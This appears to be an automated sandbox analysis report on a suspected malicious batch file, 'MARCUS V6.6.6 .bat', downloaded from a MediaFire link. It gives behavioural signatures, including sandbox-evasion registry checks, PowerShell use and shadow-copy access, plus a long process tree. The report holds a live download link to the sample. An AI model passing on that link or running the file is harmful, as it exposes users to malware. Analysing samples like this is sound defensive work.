Analysis

  • max time kernel
    289s
  • max time network
    291s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250410-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    02/05/2025, 10:53

Errors

Reason
Machine shutdown

General

  • Target

    https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file

Malware Config

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 62 IoCs

    Using powershell.exe command.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
    1⤵
    • Drops file in Windows directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x31c,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
      2⤵
        PID:240
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2056,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2
        2⤵
          PID:5832
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:3
          2⤵
            PID:2368
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
            2⤵
              PID:3968
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
              2⤵
                PID:5852
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
                2⤵
                  PID:2604
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5592,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1
                  2⤵
                    PID:4584
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
                    2⤵
                      PID:524
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
                      2⤵
                        PID:2464
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
                        2⤵
                          PID:5868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8
                          2⤵
                            PID:4624
                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
                            2⤵
                              PID:4744
                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
                              2⤵
                                PID:560
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8
                                2⤵
                                  PID:3984
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
                                  2⤵
                                    PID:6116
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
                                    2⤵
                                      PID:4496
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:8
                                      2⤵
                                        PID:4504
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:8
                                        2⤵
                                          PID:4564
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:8
                                          2⤵
                                            PID:3980
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:8
                                            2⤵
                                              PID:4008
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
                                              2⤵
                                                PID:5220
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6640,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3548
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6512,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=896 /prefetch:8
                                                2⤵
                                                  PID:2860
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
                                                  2⤵
                                                    PID:3940
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
                                                    2⤵
                                                      PID:1524
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
                                                      2⤵
                                                        PID:5116
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=896,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
                                                        2⤵
                                                          PID:2600
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6380,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:1
                                                          2⤵
                                                            PID:2000
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6932,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:1
                                                            2⤵
                                                              PID:5532
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:8
                                                              2⤵
                                                                PID:2624
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7096,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:1
                                                                2⤵
                                                                  PID:5112
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7360,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:8
                                                                  2⤵
                                                                    PID:5508
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6448,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:1
                                                                    2⤵
                                                                      PID:3972
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:1
                                                                      2⤵
                                                                        PID:2836
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:1
                                                                        2⤵
                                                                          PID:3224
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7944,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:1
                                                                          2⤵
                                                                            PID:4820
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6948,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:1
                                                                            2⤵
                                                                              PID:1780
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8284,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:1
                                                                              2⤵
                                                                                PID:5052
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6404,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:8
                                                                                2⤵
                                                                                • Modifies registry class
                                                                                PID:2488
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7644 /prefetch:8
                                                                                2⤵
                                                                                  PID:2524
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=6428,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:1
                                                                                  2⤵
                                                                                    PID:3996
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5428
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Checks processor information in registry
                                                                                      • Enumerates system info in registry
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies registry class
                                                                                      PID:2760
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
                                                                                        3⤵
                                                                                          PID:3524
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
                                                                                          3⤵
                                                                                            PID:5952
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                                                                                            3⤵
                                                                                              PID:1076
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:8
                                                                                              3⤵
                                                                                                PID:10552
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:8
                                                                                                3⤵
                                                                                                  PID:1052
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:5848
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                                    3⤵
                                                                                                      PID:3332
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                  1⤵
                                                                                                    PID:1480
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                    1⤵
                                                                                                      PID:2836
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                        2⤵
                                                                                                          PID:456
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                        1⤵
                                                                                                          PID:1604
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 1250
                                                                                                            2⤵
                                                                                                              PID:3516
